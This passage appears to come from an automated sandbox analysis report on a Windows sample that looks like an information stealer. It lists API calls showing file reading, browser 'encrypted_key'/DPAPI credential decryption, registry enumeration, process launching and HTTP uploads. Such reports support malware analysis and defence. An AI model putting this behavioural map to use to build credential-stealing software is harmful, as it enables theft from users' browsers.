                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                  • String ID:
                                  • API String ID: 2775534915-0
                                  • Opcode ID: 53bd777a164c53d73cfd4da9e271e087aec51a26bbdffb0079736ca23cb72688
                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                  • Opcode Fuzzy Hash: 53bd777a164c53d73cfd4da9e271e087aec51a26bbdffb0079736ca23cb72688
                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                  APIs
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
                                    • Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
                                    • Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022A5C5F
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022A5C7A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A5DFA
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022A60D8
                                  • lstrlen.KERNEL32(00000000), ref: 022A60E9
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022A60FA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022A6101
                                  • lstrlen.KERNEL32(00000000), ref: 022A6116
                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 022A612D
                                  • lstrlen.KERNEL32(00000000), ref: 022A613F
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022A6158
                                  • memcpy.MSVCRT(?), ref: 022A6165
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 022A6182
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022A6196
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022A61B3
                                  • InternetCloseHandle.WININET(00000000), ref: 022A6217
                                  • InternetCloseHandle.WININET(00000000), ref: 022A6224
                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A5E5F
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • InternetCloseHandle.WININET(00000000), ref: 022A622E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                  • String ID:
                                  • API String ID: 1703137719-0
                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                  • Instruction ID: 087d01ae22a7ff687a13f051d3af09efe0ca7ed39af6135d58f04e755f6a8304
                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                  • Instruction Fuzzy Hash: C412DE71970318ABCB16EBE4DD95FEEB37ABF24740F504199A106A2194EF742B88CF50
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022ACCD3
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022ACCF0
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 022ACCFC
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022ACD0F
                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022ACD1C
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022ACD40
                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022ACD5E
                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 022ACD85
                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022ACF09
                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022ACF20
                                    • Part of subcall function 022ACA87: memset.MSVCRT ref: 022ACABA
                                    • Part of subcall function 022ACA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ACAD8
                                    • Part of subcall function 022ACA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ACAE3
                                    • Part of subcall function 022ACA87: memcpy.MSVCRT(?,?,?), ref: 022ACB79
                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022ACFC1
                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022ACFD8
                                    • Part of subcall function 022ACA87: lstrcat.KERNEL32(?,00420B46), ref: 022ACBAA
                                    • Part of subcall function 022ACA87: lstrcat.KERNEL32(?,00420B47), ref: 022ACBBE
                                    • Part of subcall function 022ACA87: lstrcat.KERNEL32(?,00420B4E), ref: 022ACBDF
                                  • lstrlen.KERNEL32(00000000), ref: 022AD0AB
                                  • CloseHandle.KERNEL32(00000000), ref: 022AD103
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                  • String ID:
                                  • API String ID: 3555725114-3916222277
                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                  • Instruction ID: 2a8c4103ed2ced3f98ad1eb2c8efce3c1417cf32eedb3b180e2cb7e34e6132fc
                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                  • Instruction Fuzzy Hash: 3CE1FF75920208ABCB16EFE4DD91EEEB77ABF25340F104159F106A7198DF346A89CF60
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007812E8,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                  • StrStrA.SHLWAPI(?,00781588,00420B52), ref: 0040CAF7
                                  • StrStrA.SHLWAPI(00000000,00781318), ref: 0040CB1E
                                  • StrStrA.SHLWAPI(?,00781ED8,00000000,?,00421458,00000000,?,00000000,00000000,?,00750088,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                  • StrStrA.SHLWAPI(00000000,00781F78), ref: 0040CCB9
                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,007500B8), ref: 0040C871
                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                  • StrStrA.SHLWAPI(?,00781F78,00000000,?,0042145C,00000000,?,00000000,007500B8), ref: 0040CD5A
                                  • StrStrA.SHLWAPI(00000000,00750188), ref: 0040CD71
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                  • String ID:
                                  • API String ID: 3555725114-3916222277
                                  • Opcode ID: 7ebf70302f9c6978d5b17e417954d9c1afb0afdf58622d108c0dd4a829574462
                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                  • Opcode Fuzzy Hash: 7ebf70302f9c6978d5b17e417954d9c1afb0afdf58622d108c0dd4a829574462
                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                  APIs
                                  • strtok_s.MSVCRT ref: 00411307
                                  • strtok_s.MSVCRT ref: 00411750
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID: 0'x$x'x
                                  • API String ID: 348468850-397258310
                                  • Opcode ID: 432a9195c80f8163cf1e39b3f593716d90b1ba62d7a840187ccff8139da5087c
                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                  • Opcode Fuzzy Hash: 432a9195c80f8163cf1e39b3f593716d90b1ba62d7a840187ccff8139da5087c
                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                  APIs
                                  • memset.MSVCRT ref: 022B4505
                                  • memset.MSVCRT ref: 022B451C
                                    • Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B4553
                                  • lstrcat.KERNEL32(?,0064A30C), ref: 022B4572
                                  • lstrcat.KERNEL32(?,?), ref: 022B4586
                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 022B459A
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022B8FF7: GetFileAttributesA.KERNEL32(00000000,?,022A1DBB,?,?,0042565C,?,?,00420E1F), ref: 022B9006
                                    • Part of subcall function 022A9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022A9FA0
                                    • Part of subcall function 022A9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022A9FF9
                                    • Part of subcall function 022A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
                                    • Part of subcall function 022A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
                                    • Part of subcall function 022A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
                                    • Part of subcall function 022A9C27: ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
                                    • Part of subcall function 022A9C27: LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
                                    • Part of subcall function 022A9C27: CloseHandle.KERNEL32(000000FF), ref: 022A9D01
                                    • Part of subcall function 022B9627: GlobalAlloc.KERNEL32(00000000,022B4644,022B4644), ref: 022B963A
                                  • StrStrA.SHLWAPI(?,(&x), ref: 022B465A
                                  • GlobalFree.KERNEL32(?), ref: 022B4779
                                    • Part of subcall function 022A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D56
                                    • Part of subcall function 022A9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022A5155,00000000,?), ref: 022A9D68
                                    • Part of subcall function 022A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D91
                                    • Part of subcall function 022A9D27: LocalFree.KERNEL32(?,?,?,?,022A5155,00000000,?), ref: 022A9DA6
                                    • Part of subcall function 022AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B470A
                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 022B4727
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 022B4739
                                  • lstrcat.KERNEL32(00000000,?), ref: 022B474C
                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 022B475B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID: (&x
                                  • API String ID: 1191620704-1411363936
                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                  • Instruction ID: 792862f3279b60d6c7864688e96c2e33ff5e2e6f48c71f85cebeb86ce6948637
                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                  • Instruction Fuzzy Hash: EC7162B6910218BBDB14FBE0DC99FEE737AAF49300F008598E60596184DB35D744CF91
                                  APIs
                                  • memset.MSVCRT ref: 0041429E
                                  • memset.MSVCRT ref: 004142B5
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                  • lstrcatA.KERNEL32(?,00782718), ref: 0041430B
                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                  • lstrcatA.KERNEL32(?,00781528), ref: 00414333
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                  • StrStrA.SHLWAPI(?,00782628), ref: 004143F3
                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID: (&x
                                  • API String ID: 1191620704-1411363936
                                  • Opcode ID: e9c503bfd55bf2daae8e75d1c13cfa2327b4c89ab9ea056daaa286f6558581c9
                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                  • Opcode Fuzzy Hash: e9c503bfd55bf2daae8e75d1c13cfa2327b4c89ab9ea056daaa286f6558581c9
                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0077CC18,00000000,00020019,00000000,004205B6), ref: 004183A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                  • wsprintfA.USER32 ref: 00418459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 42a5d8bc1a5f6b6aae150ce843a0b440668e7b255a0e5373a5ffc13d61f19133
                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                  • Opcode Fuzzy Hash: 42a5d8bc1a5f6b6aae150ce843a0b440668e7b255a0e5373a5ffc13d61f19133
                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • memset.MSVCRT ref: 00410C1C
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                  • memset.MSVCRT ref: 00410CCD
                                  • memset.MSVCRT ref: 00410CE1
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID: .exe
                                  • API String ID: 1395395982-4119554291
                                  • Opcode ID: 5e4bf211cd2d807b48d0bab5dfaabd8c7764bed20d7350be932a7f57dadaee1e
                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                  • Opcode Fuzzy Hash: 5e4bf211cd2d807b48d0bab5dfaabd8c7764bed20d7350be932a7f57dadaee1e
                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                  APIs
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
                                    • Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
                                    • Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022A4B7C
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022A4BA1
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A4D21
